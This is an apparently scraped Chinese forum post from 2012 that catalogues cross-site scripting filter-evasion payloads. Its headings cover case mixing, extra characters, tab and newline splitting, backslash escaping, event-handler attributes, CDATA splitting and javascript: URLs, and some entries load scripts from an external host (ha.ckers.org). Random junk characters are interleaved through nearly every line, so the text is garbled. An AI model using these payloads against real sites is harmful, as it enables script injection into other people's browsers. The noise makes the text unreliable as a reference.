1. 改变字符大小写3 s# m' v; i0 ^- V4 Y
/ ^* G" r" p! H8 d9 o & d, g7 G& |% M% X% i7 h+ E9 R
& G' r1 l }. j V6 J4 q8 ` O( Q <sCript>alert(‘d’)</scRipT>% X4 X, B5 T3 F( q- L2 g1 Z
; W6 b+ P% ?1 Q/ _$ c( u% o2. 利用多加一些其它字符来规避Regular Expression的检查. b+ H' W5 W2 T( e/ t' Z
1 o7 `, ]. X- f5 ]9 _, u+ G
<<script>alert(‘c’)//<</script>
3 j3 g- k p: f% m- q
! ?/ v! a& [2 Q <SCRIPT a=">" SRC="t.js"></SCRIPT>( q+ I; I9 {4 Y8 n2 N' s! n
d) ?. X& v3 F- d <SCRIPT =">" SRC="t.js"></SCRIPT>
7 ]$ I9 _% w/ O; ^/ k0 e; ~8 S7 U. I! D" z; {+ _9 |
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
1 f* @( z6 f" x
1 t6 m; n7 i! q& M <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>% a/ K8 L w3 Q4 e5 Q7 D
7 o* h. G8 z1 {" C
<SCRIPT a=`>` SRC="t.js"></SCRIPT>& t3 Z4 g& S* y
. a7 y/ {' j$ J* p <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
% a w3 S& E: i
9 P, U! } s7 D# t3. 以其它扩展名取代.js
! K% @) {% d. l( B
% j0 Q& t I+ H" p# j" M( {, R <script src="bad.jpg"></script>- D+ \9 {2 s9 U* F7 C- ~- W
0 C" p8 Q: M8 m% I d) _4. 将Javascript写在CSS档里9 y; V1 W. l$ j! ^7 d# R
% C e7 K y. m' y& A <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">0 ?; v& B1 ]' _1 r9 A
5 V: k z" m6 a6 p$ ^% l
example:
% {/ D2 }) @" k+ l% s5 s
3 F" T8 t y7 l body {
) p) {1 ?$ P7 q1 m' ~
* U" l8 N" A! t3 P; n9 Y4 ?, V$ a background-image: url(‘javascript:alert("XSS");’)
9 G1 t5 G' i/ O0 z) W1 }
. _7 k9 T3 M, m }( ^3 J" F2 b0 D: W9 m* i3 ?% {8 o
) `- W9 b, K& T4 ^5. 在script的tag里加入一些其它字符
# G2 \9 ?- ^! s/ Z/ i0 H* W4 k3 [& s4 t
<SCRIPT/SRC="t.js"></SCRIPT>
/ J9 z0 [: q4 @
# {9 L1 p, G) ]8 j* @ <SCRIPT/anyword SRC="t.js"></SCRIPT>& f8 X8 |( p& E N
7 _9 x/ v+ j0 _+ ?. [6. 使用tab或是new line来规避4 a# R$ m4 F7 Y6 a
. W7 x' _0 W, ]; P1 O, G& R <img src="jav ascr ipt:alert(‘XSS3′)">% }' m) d/ ^# p% a
' ]. d4 [" q3 ?( B
<img src="jav ascr ipt:alert(‘XSS3′)">
" { M. P9 [2 T% w/ Q1 S# K0 e U9 Y6 e! K, h! @* S8 t
<IMG SRC="jav ascript:alert(‘XSS’);">
# a+ S9 [1 ^3 q( H; A% ?! q
h9 ~7 A* q7 ~' U4 }) F% G9 s -> tag) \- H% L1 a) J* s I. P( p
6 q" Y0 T! Z. D9 w -> new line G, @3 ]2 d3 F( D2 S
: \3 g3 f3 v* m# Y- D" z# @
7. 使用"\"来规避9 ]+ q# M- m; v+ I* u1 d
& h7 M @9 V B3 x& ^ u <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
% y, o) F4 [* [ i
9 b) o Q' P) s5 D [ Y <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
: |9 K- f- ? t$ Q, T. T& r) P% _' _9 J( k( j
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
6 S$ W: H2 e( q5 y0 K. k( P- u5 l# l6 y/ s9 z( q" q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
. ` w2 ?8 z) ^( a8 z' a5 t/ ~) f% @: m- f
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>7 f5 K2 k# s3 k# y$ v+ B, K; ]
+ Q0 w' ` k; J8. 使用Hex encode来规避(也可能会把";"拿掉) N: `! d% D' ^) u9 \6 p
3 ] C1 Q6 x; g <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
+ Y" Y8 N* q+ J! i" R% o' I7 O. M. l+ Q/ W" j
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">1 o( |6 p: _' w/ X% w5 U
& `' |* f5 f, W6 E8 K0 ], j
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">1 S) e+ U% S# L
O3 y- z2 E& ? 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">7 _, `* @( {" n) a* e; S& H
6 o a. p" u" H8 \
9. script in HTML tag
3 f: H8 T3 A7 ?. Q3 s1 K7 |" m9 e
+ c- x1 l# K! F) V <body onload=」alert(‘onload’)」>: G* b" `" y' {1 m, t" F, w
7 R) V0 V7 X* W# I
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
" m% P4 r" G% A9 V
6 F) `3 R- q* S+ S; S, O7 h10. 在swf里含有xss的code5 C2 r( w- I# t/ z+ b
7 C7 _8 K+ |- s& y* g5 a <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
$ V4 y: E! h5 P3 L$ t O2 N A2 H* K) m: ^- b
11. 利用CDATA将xss的code拆开,再组合起来。# Z9 H( t. T! g& q9 e9 @
, M4 J3 r: k \# \ <XML ID=I><X><C>+ S/ r- R4 [$ f4 Z, y3 R
4 X3 P- i5 h& @; R <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>* t' h4 x7 x% z& P
0 U z0 n6 [, g- w0 D </C></X>
. d' Q' r8 ]; k" Z: p( a/ z6 O. R3 c- L! v/ n& ~! F4 s
</xml>
. J0 S; ]% {2 l: z
8 R2 x3 P1 r+ Q" J% k" G0 h R <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ R, c" Z1 ?! Q" M1 s# n
% D. ~$ O% n4 b% |
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>3 [: d4 f& S7 g6 S
2 Q9 E. Y+ g" b! ]+ u# t! ?1 V <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>$ } C$ M3 ]9 \5 K0 c: g: W- R9 Y) {! |
1 f. F* Z- `3 L9 b( U# q12. 利用HTML+TIME。
. o: O0 _' T* {* n0 q, U
- v* t, E3 w; w0 v, c4 E$ Y <HTML><BODY>
: x4 H3 g2 j, o, k }( }6 A* r2 y& M4 J
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">+ @% R+ [# h6 s; b( ~" J
8 W7 w+ Z7 M. I$ A <?import namespace="t" implementation="#default#time2">! d' u' ` ^5 Y) D4 t3 J
' N b4 {6 q8 O' _ l+ s. i- I
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
, S4 w/ X8 `, _9 S" P7 m1 X
/ ], [9 q( K }* Z1 x </BODY></HTML>
$ D0 {0 \& Y/ j7 z
0 T) h. P# i: n, \ @! d13. 透过META写入Cookie。
2 _) ?% C: P) `) a- b* m5 j [* j/ y4 ?' S( h; b2 I1 L l
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">1 K3 g7 p1 I4 T- o8 J' X
_3 y! t6 k- J) s
14. javascript in src , href , url
6 g7 o: J6 f* N/ ~7 |/ S! j
% L; L, d; i) r6 F0 ~ <IFRAME SRC=javascript:alert(’13′)></IFRAME>7 I; s& ]# {) n% [: D+ i
0 M, F1 W3 I; N# o2 d
<img src="javascript:alert(‘XSS3′)">" p, S; D9 ]! K) G% E$ s4 H
& ]6 g. ^+ J5 n2 z& [<IMG DYNSRC="javascript:alert(‘XSS20′)">
( @0 M+ F" D Q, R& z1 e( j9 z. \9 d& C6 h3 P7 Q5 @" @9 l
<IMG LOWSRC="javascript:alert(‘XSS21′)">
, m* g a, S" V; S) {
4 g0 O) Y! E& [+ H <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
- G$ e4 t- |, J, g$ g/ D" M. b8 d' M" F! T( d) I, I$ s$ C
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>/ X N4 G& U& z, R3 m
+ h0 u) o( D" x, J
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">; i9 M5 n1 d% [+ J0 T
! g! B7 c u5 W <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">$ f4 r% I4 E; m4 \
4 u: x2 g' A9 ? <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
6 s; m: w5 N3 z3 k2 K o5 q P) H H. y' C" f, F7 ]# q$ T+ M
</STYLE><A CLASS=XSS></A>; n {7 F- v: v) Y
' l, y. y: ?7 K5 K
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>5 M% d' k% Q j9 }# ~8 G
D X& h' b+ ]6 x
|
发表于 2012-12-31 09:59:28
收藏
支持
反对